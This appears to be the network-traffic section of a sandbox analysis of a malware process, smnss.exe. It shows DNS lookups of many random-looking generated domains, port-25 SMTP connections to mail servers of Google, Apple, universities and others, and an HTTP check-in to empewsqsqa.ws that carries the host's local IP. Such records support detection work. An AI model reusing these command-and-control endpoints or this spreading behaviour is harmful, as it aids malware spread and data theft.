GET https://tse1.mm.bing.net/th?id=OADD2.10239340418603_15DZPLB0SHJXVDM66&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301047_1S8G2IIVJ6Z2H00N1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301480_1GLUO11W92SWCVMG3&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418604_1C96RL77YFK8DKA16&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301721_1Y64UM4ZK2VT4MVP3&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301312_1T9ZATUOGPW0HJ7P7&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200
185.132.181.97:25

mxa-00377f01.gslb.pphosted.com

smnss.exe

208 B
4
64.70.19.203:80

http://empewsqsqa.ws/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk

http

smnss.exe

406 B
168 B
6
4

HTTP Request

GET http://empewsqsqa.ws/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk
142.250.27.26:25

alt1.gmail-smtp-in.l.google.com

smnss.exe

208 B
4
142.250.27.26:25

alt1.gmail-smtp-in.l.google.com

smnss.exe

208 B
4
142.250.27.26:25

alt1.gmail-smtp-in.l.google.com

smnss.exe

208 B
4
142.250.27.26:25

alt1.gmail-smtp-in.l.google.com

smnss.exe

208 B
4
162.249.65.106:80

rrpnmeawrs.org

smnss.exe

260 B
200 B
5
5
142.250.27.26:25

alt1.gmail-smtp-in.l.google.com

smnss.exe

156 B
3
142.250.27.26:25

alt1.gmail-smtp-in.l.google.com

smnss.exe

156 B
3
162.249.65.106:80

rsqsepmwas.org

smnss.exe

260 B
200 B
5
5
209.85.203.27:25

gmail-smtp-in.l.google.com

smnss.exe

156 B
3
209.85.203.27:25

gmail-smtp-in.l.google.com

smnss.exe

156 B
3
142.250.153.26:25

aspmx3.googlemail.com

smnss.exe

104 B
2
162.249.65.106:80

rqeaqeewas.org

smnss.exe

156 B
120 B
3
3

8.8.8.8:53

tse1.mm.bing.net

dns

124 B
170 B
2
1

DNS Request

tse1.mm.bing.net

DNS Request

tse1.mm.bing.net

DNS Response

150.171.28.10

150.171.27.10
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
148 B
1
1

DNS Request

g.bing.com

DNS Response

150.171.28.10

150.171.27.10
8.8.8.8:53

14.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.160.190.20.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

qewhshmsen.info

dns

smnss.exe

122 B
77 B
2
1

DNS Request

qewhshmsen.info

DNS Request

qewhshmsen.info

DNS Response

34.218.204.173
8.8.8.8:53

gzip.org

dns

smnss.exe

108 B
70 B
2
1

DNS Request

gzip.org

DNS Request

gzip.org
8.8.8.8:53

alumni.caltech.edu

dns

smnss.exe

192 B
126 B
3
1

DNS Request

alumni.caltech.edu

DNS Request

alumni.caltech.edu

DNS Request

alumni.caltech.edu
8.8.8.8:53

cs.stanford.edu

dns

smnss.exe

61 B
121 B
1
1

DNS Request

cs.stanford.edu
8.8.8.8:53

smtp1.cs.stanford.edu

dns

smnss.exe

67 B
83 B
1
1

DNS Request

smtp1.cs.stanford.edu

DNS Response

171.64.64.25
8.8.8.8:53

acm.org

dns

smnss.exe

53 B
87 B
1
1

DNS Request

acm.org
8.8.8.8:53

mail.mailroute.net

dns

smnss.exe

64 B
96 B
1
1

DNS Request

mail.mailroute.net

DNS Response

199.89.3.120

199.89.1.120
8.8.8.8:53

wpwhpqraws.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

wpwhpqraws.in
8.8.8.8:53

rsppprawrn.org

dns

smnss.exe

60 B
76 B
1
1

DNS Request

rsppprawrn.org

DNS Response

18.208.156.248
8.8.8.8:53

173.204.218.34.in-addr.arpa

dns

73 B
137 B
1
1

DNS Request

173.204.218.34.in-addr.arpa
8.8.8.8:53

133.211.185.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

133.211.185.52.in-addr.arpa
8.8.8.8:53

gzip.org

dns

smnss.exe

54 B
70 B
1
1

DNS Request

gzip.org

DNS Response

85.187.148.2
8.8.8.8:53

mrsqwnmhwa.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

mrsqwnmhwa.in
8.8.8.8:53

apaqwweesn.com

dns

smnss.exe

60 B
133 B
1
1

DNS Request

apaqwweesn.com
8.8.8.8:53

wnhhwpqman.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

wnhhwpqman.in
8.8.8.8:53

amamqheaen.com

dns

smnss.exe

60 B
133 B
1
1

DNS Request

amamqheaen.com
8.8.8.8:53

snwwwwnqra.biz

dns

smnss.exe

60 B
122 B
1
1

DNS Request

snwwwwnqra.biz
8.8.8.8:53

248.156.208.18.in-addr.arpa

dns

73 B
129 B
1
1

DNS Request

248.156.208.18.in-addr.arpa
8.8.8.8:53

prsrsreswh.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

prsrsreswh.in
8.8.8.8:53

emsnpqmnaa.ws

dns

smnss.exe

59 B
75 B
1
1

DNS Request

emsnpqmnaa.ws

DNS Response

64.70.19.203
8.8.8.8:53

alumni-caltech-edu.mail.protection.outlook.com

dns

smnss.exe

92 B
156 B
1
1

DNS Request

alumni-caltech-edu.mail.protection.outlook.com

DNS Response

52.101.9.12

52.101.194.19

52.101.194.3

52.101.9.2
8.8.8.8:53

gmail.com

dns

smnss.exe

55 B
178 B
1
1

DNS Request

gmail.com
8.8.8.8:53

alt3.gmail-smtp-in.l.google.com

dns

smnss.exe

231 B
93 B
3
1

DNS Request

alt3.gmail-smtp-in.l.google.com

DNS Request

alt3.gmail-smtp-in.l.google.com

DNS Request

alt3.gmail-smtp-in.l.google.com

DNS Response

142.251.9.26
8.8.8.8:53

m-ou.se

dns

smnss.exe

53 B
232 B
1
1

DNS Request

m-ou.se
8.8.8.8:53

alt1.aspmx.l.google.com

dns

smnss.exe

69 B
85 B
1
1

DNS Request

alt1.aspmx.l.google.com

DNS Response

142.250.27.27
8.8.8.8:53

aswahwaqwn.com

dns

smnss.exe

60 B
133 B
1
1

DNS Request

aswahwaqwn.com
8.8.8.8:53

epnnmpmnea.ws

dns

smnss.exe

59 B
75 B
1
1

DNS Request

epnnmpmnea.ws

DNS Response

64.70.19.203
8.8.8.8:53

203.19.70.64.in-addr.arpa

dns

71 B
109 B
1
1

DNS Request

203.19.70.64.in-addr.arpa
8.8.8.8:53

nmmmswamss.us

dns

smnss.exe

59 B
122 B
1
1

DNS Request

nmmmswamss.us
8.8.8.8:53

wpanwhahpn.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

wpanwhahpn.in
8.8.8.8:53

qqrsmeawrh.info

dns

smnss.exe

61 B
140 B
1
1

DNS Request

qqrsmeawrh.info
8.8.8.8:53

wsneamsrqs.in

dns

smnss.exe

118 B
112 B
2
1

DNS Request

wsneamsrqs.in

DNS Request

wsneamsrqs.in
8.8.8.8:53

rrnsweenen.org

dns

smnss.exe

60 B
76 B
1
1

DNS Request

rrnsweenen.org

DNS Response

162.249.65.106
8.8.8.8:53

2.1.0

dns

smnss.exe

102 B
126 B
2
1

DNS Request

2.1.0

DNS Request

2.1.0
8.8.8.8:53

4.0.1

dns

smnss.exe

51 B
126 B
1
1

DNS Request

4.0.1
8.8.8.8:53

nocorp.me

dns

smnss.exe

55 B
124 B
1
1

DNS Request

nocorp.me
8.8.8.8:53

in2-smtp.messagingengine.com

dns

smnss.exe

74 B
106 B
1
1

DNS Request

in2-smtp.messagingengine.com

DNS Response

202.12.124.217

202.12.124.216
8.8.8.8:53

wpsranresn.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

wpsranresn.in
8.8.8.8:53

qqwaqwqwns.info

dns

smnss.exe

61 B
140 B
1
1

DNS Request

qqwaqwqwns.info
8.8.8.8:53

wshmnneqsr.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

wshmnneqsr.in
8.8.8.8:53

rnrmsaeesr.org

dns

smnss.exe

60 B
76 B
1
1

DNS Request

rnrmsaeesr.org

DNS Response

162.249.65.106
8.8.8.8:53

outlook.com

dns

smnss.exe

57 B
100 B
1
1

DNS Request

outlook.com
8.8.8.8:53

outlook-com.olc.protection.outlook.com

dns

smnss.exe

84 B
148 B
1
1

DNS Request

outlook-com.olc.protection.outlook.com

DNS Response

52.101.68.38

52.101.73.23

52.101.11.20

52.101.68.11
8.8.8.8:53

eweqmrhnra.ws

dns

smnss.exe

59 B
75 B
1
1

DNS Request

eweqmrhnra.ws

DNS Response

64.70.19.203
8.8.8.8:53

smtp2.cs.stanford.edu

dns

smnss.exe

67 B
83 B
1
1

DNS Request

smtp2.cs.stanford.edu

DNS Response

171.64.64.26
8.8.8.8:53

qaeesahees.info

dns

smnss.exe

122 B
140 B
2
1

DNS Request

qaeesahees.info

DNS Request

qaeesahees.info
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

hwpprwwawa.net

dns

smnss.exe

60 B
133 B
1
1

DNS Request

hwpprwwawa.net
8.8.8.8:53

pawrsswnsa.in

dns

smnss.exe

236 B
112 B
4
1

DNS Request

pawrsswnsa.in

DNS Request

pawrsswnsa.in

DNS Request

pawrsswnsa.in

DNS Request

pawrsswnsa.in
8.8.8.8:53

aspmx5.googlemail.com

dns

smnss.exe

201 B
83 B
3
1

DNS Request

aspmx5.googlemail.com

DNS Request

aspmx5.googlemail.com

DNS Request

aspmx5.googlemail.com

DNS Response

142.250.150.27
8.8.8.8:53

alumni-caltech-edu.mail.protection.outlook.com

dns

smnss.exe

92 B
156 B
1
1

DNS Request

alumni-caltech-edu.mail.protection.outlook.com

DNS Response

52.101.41.21

52.101.9.26

52.101.8.44

52.101.194.13
8.8.8.8:53

coin.mpg

dns

smnss.exe

54 B
129 B
1
1

DNS Request

coin.mpg
8.8.8.8:53

alt2.gmail-smtp-in.l.google.com

dns

smnss.exe

77 B
93 B
1
1

DNS Request

alt2.gmail-smtp-in.l.google.com

DNS Response

142.250.153.27
8.8.8.8:53

ewaehhmrqh.ws

dns

smnss.exe

59 B
75 B
1
1

DNS Request

ewaehhmrqh.ws

DNS Response

64.70.19.203
8.8.8.8:53

apple.com

dns

smnss.exe

55 B
258 B
1
1

DNS Request

apple.com
8.8.8.8:53

mx-in.g.apple.com

dns

smnss.exe

63 B
79 B
1
1

DNS Request

mx-in.g.apple.com

DNS Response

17.57.165.2
8.8.8.8:53

pobox.com

dns

smnss.exe

55 B
246 B
1
1

DNS Request

pobox.com
8.8.8.8:53

pb-mx10.pobox.com

dns

smnss.exe

63 B
79 B
1
1

DNS Request

pb-mx10.pobox.com

DNS Response

64.147.108.51
8.8.8.8:53

ahrwrshwph.com

dns

smnss.exe

60 B
133 B
1
1

DNS Request

ahrwrshwph.com
8.8.8.8:53

sqaqqaeqmh.biz

dns

smnss.exe

60 B
122 B
1
1

DNS Request

sqaqqaeqmh.biz
8.8.8.8:53

nhqpwhmama.us

dns

smnss.exe

59 B
122 B
1
1

DNS Request

nhqpwhmama.us
8.8.8.8:53

sesawnwqea.biz

dns

smnss.exe

60 B
122 B
1
1

DNS Request

sesawnwqea.biz
8.8.8.8:53

qpwhwpqpqa.info

dns

smnss.exe

61 B
140 B
1
1

DNS Request

qpwhwpqpqa.info
8.8.8.8:53

mqmwshhaqh.in

dns

smnss.exe

118 B
112 B
2
1

DNS Request

mqmwshhaqh.in

DNS Request

mqmwshhaqh.in
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

rrqmheqmqh.org

dns

smnss.exe

240 B
76 B
4
1

DNS Request

rrqmheqmqh.org

DNS Request

rrqmheqmqh.org

DNS Request

rrqmheqmqh.org

DNS Request

rrqmheqmqh.org

DNS Response

162.249.65.106
8.8.8.8:53

in1-smtp.messagingengine.com

dns

smnss.exe

148 B
170 B
2
1

DNS Request

in1-smtp.messagingengine.com

DNS Request

in1-smtp.messagingengine.com

DNS Response

103.168.172.221

103.168.172.217

103.168.172.219

103.168.172.216

103.168.172.218

103.168.172.220
8.8.8.8:53

netcom.com

dns

smnss.exe

112 B
164 B
2
1

DNS Request

netcom.com

DNS Request

netcom.com
8.8.8.8:53

northcoast.com

dns

smnss.exe

120 B
190 B
2
1

DNS Request

northcoast.com

DNS Request

northcoast.com
8.8.8.8:53

cl.cam.ac.uk

dns

smnss.exe

174 B
77 B
3
1

DNS Request

cl.cam.ac.uk

DNS Request

cl.cam.ac.uk

DNS Request

cl.cam.ac.uk
8.8.8.8:53

src.dec.com

dns

smnss.exe

114 B
147 B
2
1

DNS Request

src.dec.com

DNS Request

src.dec.com
8.8.8.8:53

mx04.earthlink-vadesecure.net

dns

smnss.exe

75 B
91 B
1
1

DNS Request

mx04.earthlink-vadesecure.net

DNS Response

147.135.98.120
8.8.8.8:53

mxa-00377f03.gslb.pphosted.com

dns

smnss.exe

76 B
92 B
1
1

DNS Request

mxa-00377f03.gslb.pphosted.com

DNS Response

205.220.164.130
8.8.8.8:53

mx.cam.ac.uk

dns

smnss.exe

58 B
122 B
1
1

DNS Request

mx.cam.ac.uk

DNS Response

131.111.8.148

131.111.8.146

131.111.8.147

131.111.8.149
8.8.8.8:53

theriver.com

dns

smnss.exe

58 B
101 B
1
1

DNS Request

theriver.com
8.8.8.8:53

bryson.demon.co.uk

dns

smnss.exe

64 B
140 B
1
1

DNS Request

bryson.demon.co.uk
8.8.8.8:53

onlineconnections.com.au

dns

smnss.exe

70 B
86 B
1
1

DNS Request

onlineconnections.com.au
8.8.8.8:53

openoffice.org

dns

smnss.exe

60 B
171 B
1
1

DNS Request

openoffice.org
8.8.8.8:53

ismtp.sitestar.everyone.net

dns

smnss.exe

73 B
89 B
1
1

DNS Request

ismtp.sitestar.everyone.net

DNS Response

64.29.151.236
8.8.8.8:53

mx1-lw-eu.apache.org

dns

smnss.exe

66 B
150 B
1
1

DNS Request

mx1-lw-eu.apache.org
8.8.8.8:53

mx1-lw-us.apache.org

dns

smnss.exe

66 B
150 B
1
1

DNS Request

mx1-lw-us.apache.org
8.8.8.8:53

onlineconnections.com.au

dns

smnss.exe

70 B
86 B
1
1

DNS Request

onlineconnections.com.au

DNS Response

192.254.190.168
8.8.8.8:53

mx2-lw-eu.apache.org

dns

smnss.exe

66 B
150 B
1
1

DNS Request

mx2-lw-eu.apache.org
8.8.8.8:53

mx2-lw-us.apache.org

dns

smnss.exe

66 B
150 B
1
1

DNS Request

mx2-lw-us.apache.org
8.8.8.8:53

ehpspqshqa.ws

dns

smnss.exe

59 B
75 B
1
1

DNS Request

ehpspqshqa.ws

DNS Response

64.70.19.203
8.8.8.8:53

phphweqwna.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

phphweqwna.in
8.8.8.8:53

147.142.123.92.in-addr.arpa

dns

219 B
139 B
3
1

DNS Request

147.142.123.92.in-addr.arpa

DNS Request

147.142.123.92.in-addr.arpa

DNS Request

147.142.123.92.in-addr.arpa
8.8.8.8:53

snprrannra.biz

dns

smnss.exe

60 B
122 B
1
1

DNS Request

snprrannra.biz
8.8.8.8:53

rahqwwphsh.org

dns

smnss.exe

60 B
76 B
1
1

DNS Request

rahqwwphsh.org

DNS Response

162.249.65.106
8.8.8.8:53

hpehwwhnqn.net

dns

smnss.exe

60 B
133 B
1
1

DNS Request

hpehwwhnqn.net
8.8.8.8:53

pmqmannrna.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

pmqmannrna.in
8.8.8.8:53

mrrmehqnpa.in

dns

smnss.exe

177 B
224 B
3
2

DNS Request

mrrmehqnpa.in

DNS Request

mrrmehqnpa.in

DNS Request

mrrmehqnpa.in
8.8.8.8:53

alumni-caltech-edu.mail.protection.outlook.com

dns

smnss.exe

92 B
156 B
1
1

DNS Request

alumni-caltech-edu.mail.protection.outlook.com

DNS Response

52.101.40.1

52.101.194.13

52.101.9.14

52.101.41.6
8.8.8.8:53

nongnu.org

dns

smnss.exe

56 B
81 B
1
1

DNS Request

nongnu.org
8.8.8.8:53

eggs.gnu.org

dns

smnss.exe

58 B
74 B
1
1

DNS Request

eggs.gnu.org

DNS Response

209.51.188.92
8.8.8.8:53

cs.stanford.edu

dns

smnss.exe

122 B
77 B
2
1

DNS Request

cs.stanford.edu

DNS Request

cs.stanford.edu

DNS Response

171.64.64.64
8.8.8.8:53

qwpehrrhqh.info

dns

smnss.exe

122 B
140 B
2
1

DNS Request

qwpehrrhqh.info

DNS Request

qwpehrrhqh.info
8.8.8.8:53

meammaenmn.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

meammaenmn.in
8.8.8.8:53

rsampnrran.org

dns

smnss.exe

120 B
76 B
2
1

DNS Request

rsampnrran.org

DNS Request

rsampnrran.org

DNS Response

162.249.65.106
8.8.8.8:53

kinoho.net

dns

smnss.exe

112 B
189 B
2
1

DNS Request

kinoho.net

DNS Request

kinoho.net
8.8.8.8:53

riseup.net

dns

smnss.exe

112 B
76 B
2
1

DNS Request

riseup.net

DNS Request

riseup.net
8.8.8.8:53

aspmx2.googlemail.com

dns

smnss.exe

67 B
83 B
1
1

DNS Request

aspmx2.googlemail.com

DNS Response

142.250.27.26
8.8.8.8:53

mx1.riseup.net

dns

smnss.exe

120 B
76 B
2
1

DNS Request

mx1.riseup.net

DNS Request

mx1.riseup.net

DNS Response

198.252.153.129
8.8.8.8:53

alt4.gmail-smtp-in.l.google.com

dns

smnss.exe

77 B
93 B
1
1

DNS Request

alt4.gmail-smtp-in.l.google.com

DNS Response

142.250.150.26
8.8.8.8:53

aspmx.l.google.com

dns

smnss.exe

64 B
80 B
1
1

DNS Request

aspmx.l.google.com

DNS Response

209.85.202.27
8.8.8.8:53

mx-in-ma.apple.com

dns

smnss.exe

128 B
80 B
2
1

DNS Request

mx-in-ma.apple.com

DNS Request

mx-in-ma.apple.com

DNS Response

17.171.208.6
8.8.8.8:53

pb-mx11.pobox.com

dns

smnss.exe

126 B
79 B
2
1

DNS Request

pb-mx11.pobox.com

DNS Request

pb-mx11.pobox.com

DNS Response

64.147.108.52
8.8.8.8:53

mail.ru

dns

smnss.exe

106 B
73 B
2
1

DNS Request

mail.ru

DNS Request

mail.ru
8.8.8.8:53

bog.msu.ru

dns

smnss.exe

112 B
112 B
2
2

DNS Request

bog.msu.ru

DNS Request

bog.msu.ru
8.8.8.8:53

mxs.mail.ru

dns

smnss.exe

57 B
89 B
1
1

DNS Request

mxs.mail.ru

DNS Response

217.69.139.150

94.100.180.31
8.8.8.8:53

mx01.earthlink-vadesecure.net

dns

smnss.exe

150 B
91 B
2
1

DNS Request

mx01.earthlink-vadesecure.net

DNS Request

mx01.earthlink-vadesecure.net

DNS Response

51.81.61.70
8.8.8.8:53

mxb-00377f03.gslb.pphosted.com

dns

smnss.exe

76 B
92 B
1
1

DNS Request

mxb-00377f03.gslb.pphosted.com

DNS Response

205.220.176.130
8.8.8.8:53

mrmwmnarws.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

mrmwmnarws.in
8.8.8.8:53

nwrnwprmmh.us

dns

smnss.exe

118 B
122 B
2
1

DNS Request

nwrnwprmmh.us

DNS Request

nwrnwprmmh.us
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

296 B
128 B
4
1

DNS Request

172.214.232.199.in-addr.arpa

DNS Request

172.214.232.199.in-addr.arpa

DNS Request

172.214.232.199.in-addr.arpa

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

sshnsrpenh.biz

dns

smnss.exe

60 B
122 B
1
1

DNS Request

sshnsrpenh.biz
8.8.8.8:53

psnqrqmpeh.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

psnqrqmpeh.in
8.8.8.8:53

wwearmsqrs.in

dns

smnss.exe

236 B
112 B
4
1

DNS Request

wwearmsqrs.in

DNS Request

wwearmsqrs.in

DNS Request

wwearmsqrs.in

DNS Request

wwearmsqrs.in
8.8.8.8:53

aqanannwqh.com

dns

smnss.exe

180 B
133 B
3
1

DNS Request

aqanannwqh.com

DNS Request

aqanannwqh.com

DNS Request

aqanannwqh.com
8.8.8.8:53

wasasnqrna.in

dns

smnss.exe

118 B
112 B
2
1

DNS Request

wasasnqrna.in

DNS Request

wasasnqrna.in
8.8.8.8:53

wnshehamhh.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

wnshehamhh.in
8.8.8.8:53

remrpqpseh.org

dns

smnss.exe

60 B
76 B
1
1

DNS Request

remrpqpseh.org

DNS Response

162.249.65.106
8.8.8.8:53

hwnppemeea.net

dns

smnss.exe

60 B
133 B
1
1

DNS Request

hwnppemeea.net
8.8.8.8:53

pnaqheqnsa.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

pnaqheqnsa.in
8.8.8.8:53

mwhnpqrmrn.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

mwhnpqrmrn.in
8.8.8.8:53

pwramqmsms.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

pwramqmsms.in
8.8.8.8:53

hmamsmwhar.net

dns

smnss.exe

180 B
133 B
3
1

DNS Request

hmamsmwhar.net

DNS Request

hmamsmwhar.net

DNS Request

hmamsmwhar.net
8.8.8.8:53

gmail-smtp-in.l.google.com

dns

smnss.exe

144 B
88 B
2
1

DNS Request

gmail-smtp-in.l.google.com

DNS Request

gmail-smtp-in.l.google.com

DNS Response

209.85.203.27
8.8.8.8:53

mx-in-rno.apple.com

dns

smnss.exe

260 B
81 B
4
1

DNS Request

mx-in-rno.apple.com

DNS Request

mx-in-rno.apple.com

DNS Request

mx-in-rno.apple.com

DNS Request

mx-in-rno.apple.com

DNS Response

17.179.253.242
8.8.8.8:53

pb-mx9.pobox.com

dns

smnss.exe

124 B
78 B
2
1

DNS Request

pb-mx9.pobox.com

DNS Request

pb-mx9.pobox.com

DNS Response

64.147.108.50
8.8.8.8:53

pqshhpemrn.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

pqshhpemrn.in
8.8.8.8:53

wpqqhhspps.in

dns

smnss.exe

59 B
75 B
1
1

DNS Request

wpqqhhspps.in

DNS Response

13.251.16.150
8.8.8.8:53

nqenrpwpeh.us

dns

smnss.exe

118 B
122 B
2
1

DNS Request

nqenrpwpeh.us

DNS Request

nqenrpwpeh.us
8.8.8.8:53

150.16.251.13.in-addr.arpa

dns

216 B
140 B
3
1

DNS Request

150.16.251.13.in-addr.arpa

DNS Request

150.16.251.13.in-addr.arpa

DNS Request

150.16.251.13.in-addr.arpa
8.8.8.8:53

spawwehsrs.biz

dns

smnss.exe

120 B
122 B
2
1

DNS Request

spawwehsrs.biz

DNS Request

spawwehsrs.biz
8.8.8.8:53

mxb-00377f01.gslb.pphosted.com

dns

smnss.exe

152 B
92 B
2
1

DNS Request

mxb-00377f01.gslb.pphosted.com

DNS Request

mxb-00377f01.gslb.pphosted.com

DNS Response

185.132.181.97
8.8.8.8:53

ppeseaqmms.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

ppeseaqmms.in
8.8.8.8:53

msarphnewh.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

msarphnewh.in
8.8.8.8:53

pwqpewwahh.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

pwqpewwahh.in
8.8.8.8:53

hmparqsaqa.net

dns

smnss.exe

60 B
133 B
1
1

DNS Request

hmparqsaqa.net
8.8.8.8:53

qsqpspspqn.info

dns

smnss.exe

61 B
140 B
1
1

DNS Request

qsqpspspqn.info
8.8.8.8:53

haearrsqhn.net

dns

smnss.exe

60 B
133 B
1
1

DNS Request

haearrsqhn.net
8.8.8.8:53

qnrnwnwaas.info

dns

smnss.exe

122 B
140 B
2
1

DNS Request

qnrnwnwaas.info

DNS Request

qnrnwnwaas.info
8.8.8.8:53

mx03.earthlink-vadesecure.net

dns

smnss.exe

75 B
91 B
1
1

DNS Request

mx03.earthlink-vadesecure.net

DNS Response

51.81.232.218
8.8.8.8:53

weaeprawra.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

weaeprawra.in
8.8.8.8:53

qmhqeesawh.info

dns

smnss.exe

61 B
140 B
1
1

DNS Request

qmhqeesawh.info
8.8.8.8:53

ssnsphrnws.biz

dns

smnss.exe

60 B
122 B
1
1

DNS Request

ssnsphrnws.biz
8.8.8.8:53

aewrhprres.com

dns

smnss.exe

120 B
76 B
2
1

DNS Request

aewrhprres.com

DNS Request

aewrhprres.com

DNS Response

216.245.214.81
8.8.8.8:53

mpehqsqwmn.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

mpehqsqwmn.in
8.8.8.8:53

rnrmmnpnpn.org

dns

smnss.exe

60 B
76 B
1
1

DNS Request

rnrmmnpnpn.org

DNS Response

162.249.65.106
8.8.8.8:53

mwaaemmnhn.in

dns

smnss.exe

118 B
112 B
2
1

DNS Request

mwaaemmnhn.in

DNS Request

mwaaemmnhn.in
8.8.8.8:53

19.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

19.229.111.52.in-addr.arpa
8.8.8.8:53

asnrrsamsa.com

dns

smnss.exe

60 B
76 B
1
1

DNS Request

asnrrsamsa.com

DNS Response

212.32.237.91
8.8.8.8:53

91.237.32.212.in-addr.arpa

dns

72 B
135 B
1
1

DNS Request

91.237.32.212.in-addr.arpa
8.8.8.8:53

whmrraawha.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

whmrraawha.in
8.8.8.8:53

qmsaspnsna.info

dns

smnss.exe

61 B
140 B
1
1

DNS Request

qmsaspnsna.info
8.8.8.8:53

hnehqqwwrs.net

dns

smnss.exe

60 B
133 B
1
1

DNS Request

hnehqqwwrs.net
8.8.8.8:53

qppamspwhs.info

dns

smnss.exe

61 B
140 B
1
1

DNS Request

qppamspwhs.info
8.8.8.8:53

weeqshswms.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

weeqshswms.in
8.8.8.8:53

aanparshnh.com

dns

smnss.exe

120 B
76 B
2
1

DNS Request

aanparshnh.com

DNS Request

aanparshnh.com

DNS Response

77.247.183.147
8.8.8.8:53

hpeqherars.net

dns

smnss.exe

60 B
133 B
1
1

DNS Request

hpeqherars.net
8.8.8.8:53

nnhhneqnrh.us

dns

smnss.exe

59 B
122 B
1
1

DNS Request

nnhhneqnrh.us
8.8.8.8:53

saanqmaqpn.biz

dns

smnss.exe

60 B
122 B
1
1

DNS Request

saanqmaqpn.biz
8.8.8.8:53

armahmrsaa.com

dns

smnss.exe

60 B
133 B
1
1

DNS Request

armahmrsaa.com
8.8.8.8:53

wqahhaqenh.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

wqahhaqenh.in
8.8.8.8:53

aharwhphnh.com

dns

smnss.exe

60 B
76 B
1
1

DNS Request

aharwhphnh.com

DNS Response

23.82.12.30
8.8.8.8:53

mnrepmepar.in

dns

smnss.exe

118 B
75 B
2
1

DNS Request

mnrepmepar.in

DNS Request

mnrepmepar.in

DNS Response

13.251.16.150
8.8.8.8:53

147.183.247.77.in-addr.arpa

dns

73 B
137 B
1
1

DNS Request

147.183.247.77.in-addr.arpa
8.8.8.8:53

30.12.82.23.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

30.12.82.23.in-addr.arpa
8.8.8.8:53

apqhwmnqrh.com

dns

smnss.exe

240 B
133 B
4
1

DNS Request

apqhwmnqrh.com

DNS Request

apqhwmnqrh.com

DNS Request

apqhwmnqrh.com

DNS Request

apqhwmnqrh.com
8.8.8.8:53

aspmx4.googlemail.com

dns

smnss.exe

201 B
83 B
3
1

DNS Request

aspmx4.googlemail.com

DNS Request

aspmx4.googlemail.com

DNS Request

aspmx4.googlemail.com

DNS Response

142.251.9.26
8.8.8.8:53

alt1.gmail-smtp-in.l.google.com

dns

smnss.exe

77 B
93 B
1
1

DNS Request

alt1.gmail-smtp-in.l.google.com

DNS Response

142.250.27.26
8.8.8.8:53

pb-mx21.pobox.com

dns

smnss.exe

126 B
79 B
2
1

DNS Request

pb-mx21.pobox.com

DNS Request

pb-mx21.pobox.com

DNS Response

173.228.157.40
8.8.8.8:53

mehsnsamha.in

dns

smnss.exe

59 B
112 B
1
1

DNS Request

mehsnsamha.in
8.8.8.8:53

qqpqwehwah.info

dns

smnss.exe

122 B
140 B
2
1

DNS Request

qqpqwehwah.info

DNS Request

qqpqwehwah.info
8.8.8.8:53

sqmswpnqws.biz

dns

smnss.exe

60 B
122 B
1
1

DNS Request

sqmswpnqws.biz
8.8.8.8:53

mx-in-sg.apple.com

dns

smnss.exe

64 B
80 B
1
1

DNS Request

